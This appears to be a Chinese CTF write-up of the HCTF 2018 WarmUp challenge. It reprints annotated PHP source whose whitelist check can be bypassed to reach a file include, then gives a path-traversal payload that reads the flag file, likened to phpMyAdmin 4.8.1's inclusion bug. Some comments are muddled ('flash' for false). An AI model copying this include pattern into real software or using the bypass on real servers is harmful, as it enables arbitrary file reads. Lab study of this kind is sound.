[PHP知识库][HCTF 2018]WarmUp

[HCTF 2018]WarmUp

代码审计

文件包含漏洞(phpmyadmin 4.8.1任意文件包含)

查看源码发现source.php，打开查看在白名单里发现了hint.php

访问得到提示

 <?php
    highlight_file(__FILE__);                                                   
	
	//highlight_file(filename,return):对文件进行高亮显示，使用该函数时对整个文件被显示，不论是密码还是其他敏感文件
	//用于高亮的颜色可通过php.ini文件进行设置，或者通过调用ini_set()函数进行设置
	
	
	
    class emmm
    {
        public static function checkFile(&$page) 				
        //传入变量page，也就是我们刚刚传进来的file
        {
            
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];         
             //白名单列表
			
            if (! isset($page) || !is_string($page)) {                     
                     //isset()判断变量是否已经设置
                
                echo "you can't see it";                               
                   //is_string()判断变量是不是字符串
               
                return false;                                         
                    //&&或者||前后都正确才能运行if的值
            }

																
	
	//in_array()函数判断变量是否符合白名单里的，如果符合则执行
            if (in_array($page, $whitelist)) {
                return true;
            }
																
	
	//过滤问好的函数（如果$page的值有?则从?之前提取数字）
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')                 

 //mb_substr返回$page.里?和?之间的数据，
 也就是截断,截取file=ddd
            );
			
																
//第二次检测传进来的值是否匹配白名单列表，若符合则执行真
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);                       
     //url对$page解码
													
//第二次过滤问号的函数（如果$page的值有?则从?之前提取字符串）
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {            
     
//第三次检测传进来的值是否匹配白名单列表，若符合则执行真
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
//要求我们上传的file变量不能为空
    if (! empty($_REQUEST['file'])                   


        && is_string($_REQUEST['file'])	 //要求上传的为字符串
        && emmm::checkFile($_REQUEST['file'])    
                               //将我们的的值传到emmm类里面的checkFile函数
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

总体来说利用的是源码最后的文件包含漏洞

include $_REQUEST[‘file’];

也就是需要include ffffllllaaaagggg 文件，因为我们不值得ffffllllaaaagggg具体在哪个文件里所以需要…/来绕过

构造payload:

index.php?file=source.php?../../../../../ffffllllaaaagggg

总体的流程

第一个if返回flash

第二个if返回flash

经过mb_substr截断 _page

第三个if返回ture，这时退出checkFile()，送到最后一个if检查而且截断之后的变量满足if(true&&true&&true)，则执行

include(source.php?../../../../../../ffffllllaaaagggg))

文章参考：https://blog.csdn.net/qq_51927659/article/details/116030931?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link